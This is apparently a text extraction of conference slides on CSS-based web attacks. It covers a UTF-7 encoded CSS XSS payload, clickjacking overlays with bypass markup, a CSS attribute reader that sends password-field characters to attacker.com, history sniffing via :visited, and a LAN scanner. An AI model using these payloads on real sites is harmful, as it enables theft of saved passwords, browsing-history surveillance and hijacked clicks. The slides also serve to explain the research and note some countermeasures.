Documente Academic
Documente Profesional
Documente Cultură
Old Attacks
New Research
New Attacks
Old Attacks - reloaded
@charset "UTF-7";
+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcw
BpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-
Which produces:
* {xss:expression(alert(1))}
CSS Overlays (clickjacking)
_______________ ______________
_______________ ______________
_______________ ______________
CSS Overlays advanced attacks
<form
action="http://ficlets.com/signin/openid.signin"
method="post" id="openidform" target="iframe">
<input type="hidden" name="openid"
id="openidurl" class="textfield"
value="openidtester.pip.verisignlabs.com" />
</form>
ficlets.com connects to Verisign provider
CSS Overlays advanced attacks
Verisign case study cont.
OpenID provider (Verisign) is now in our iframe
CSS Overlays advanced attacks
Verisign case study cont.
Using multiple iframes and div offsets we can cover the other areas
with solid colours and position the target area wherever we like
CSS Overlays advanced attacks
Verisign case study cont.
• Opacity can be used but solid fills make the attack harder to
protect against at the browser level
• Referer checking can neuter attack but not always available and no
implemented on most sites
• Referer can be faked
• David Ross idea to use a "clickjacket", accessible style sheet
which uses expressions to display a hover popup which appears
above other elements.
CSS Overlays Work Arrounds
Someone -> iframe-breaker
In some browsers (IE) JS can be disabled (iframe-
breaker-breaker)
<html>
<head>
</head>
<body>
<image ISMAP style="position:absolute;width:100%;height:100%;"
onmousedown="this.style.display='none'">
<iframe src="http://www.microsoft.com" id=x type=text/html
width=500 height=500 codetype=text/html id=x></iframe></image>
</button>
</body>
</html>
Exploiting clickjacking defenses
iframe,frame,object,applet {
border:1px solid #000 !important;
visibility:visible !important;
opacity: 1 !important;
filter: alpha(opacity=100) !important;
position:absolute !important;
float:none !important;
overflow:auto !important;
....
}
More clickjacking defenses
Advantages:
• Object styles are locked
• User can see clearly that it is a external site
• Javascript and CSS modification of styles have no effect
Disadvantages:
• Manuel Caballero hacked it :)
• Parent element allows opacity modification
More clickjacking defenses
Advantages:
• Hard for attacker to exploit if external objects are clearly visible
and above everything else
Disadvantages:
• Designers would complain about limiting design ideas
• External objects would look ugly
• Could break existing sites
New Research
Algorithms
Arithmetics & Memory
- Check out Demos on http://p42.us/css
How:
element:condition{
action;
}
element: anything
condition: :visited, :active, :hover, :selected, etc..
action: background(remote request), display,
opacity, visibility.
Loops
- Check out Demos on http://p42.us/css
Recalc of style:
- META refreshes
<meta http-equiv=“refresh” content=“0;URL=#1”>
- -moz-binding
*{-moz-binding:url(“remote-req#id”)}
For matching:
<input type=“password” value=“savedpassword”/>
• input{}
– Matches all inputs.
• input[type]{}
– Matches all inputs with an attribute “type”.
• input[type=“password”]{}
– Matches all inputs of type “password”.
CSS HTML Attribute Reader
For matching:
<input type=“password” value=“savedpassword”/>
• input[type*=“swor”]{}
– Matches all input elements whose type attribute contains “swor”
(anywhere)
• input[type^=“pass”]{}
– Matches all inputs whose type attribute starts with “pass”
• input[type$=“word”]{}
– Matches all inputs whose type attribute ends with “word”
CSS HTML Attribute Reader
Attempts to read an attribute with [=] selector with help of the [*=]
selector!
Calculate the range of the chars in the value.
input[value*=“\x10”]{
background:url(“//attacker.com/?h=\x10”);
}
…
111 different variations
…
input[value*=“\x7F”]{
background:url(“//attacker.com/?h=\x7F”);
}
CSS HTML Attribute Reader – Try 3
First, we can use [^=] and [$=] selectors at the same time halving
the number of requests.
CSS HTML Attribute Reader
1 2 3
Detect first char Detect second char
Detect the range
and eigthth char and seventh char
4 5 6
Detect third char Detect fourth char Confirm we have
and sixth char and fifth char the correct string
CSS HTML Attribute Reader
Demo:
-
Async stylesheet load attribute reader (read the contents of a text field w
http://eaea.sirdarckcat.net/cssar/
These will inherit all styles of the parent document (cross origin).
<style>@import”exploit”;</style>
<iframe src=“victim” seamless=“seamless”/>
CSS History Hacks
Cross-browser
<style>
a:visited{background:url(//visited)}
a:not(:visited){background:url(//not-visited)}
</style>
<a href="http://website/"> </a>
Impact Privacy
Counter-measures
Firefox: SafeHistory addon
IE: Disable history
Demo: http://ha.ckers.org/weird/CSS-history.cgi
CSS LAN Scanner
PoC:
CSS LAN Scanner
How it works:
Error pages don't create a log in the history.
If a website is valid, then it is marked as visited.
The scanner just visits a lot of LAN IPs, and checks
if they were marked as visited.
CSS LAN Scanner
attacker.com
10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner
attacker.com
10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner
attacker.com
10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner
attacker.com
10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner
attacker.com
10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner
attacker.com
10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSSH - CSS Stealing Some History
attacker.com shows a
digg.com
lot of possible websites
twitter.com that the user may have
slashdot.org visited.
hi5.com
myspace
Victim
CSSH - History Crawler
Victim
CSSH - History Crawler
Victim
CSSH - History Crawler
CSSH - Navigation Monitoring
What if...
Yes
CSSH - Navigation Monitoring
Attacker
Victim
CSSH - Navigation Monitoring
Attacker
Victim
digg.com
CSSH - Navigation Monitoring
Attacker
Victim
digg.com
CSSH - Navigation Monitoring
Attacker
digg.com
CSSH - Navigation Monitoring
Attacker
digg.com cnn.com
CSSH - Navigation Monitoring
Attacker
Victim
digg.com cnn.com
CSSH - Navigation Monitoring
Attacker
Victim
digg.com cnn.com
CSSH - Navigation Monitoring
Public Demo :
http://eaea.sirdarckcat.net/cssh-mon/
Cross-browser.
Thanks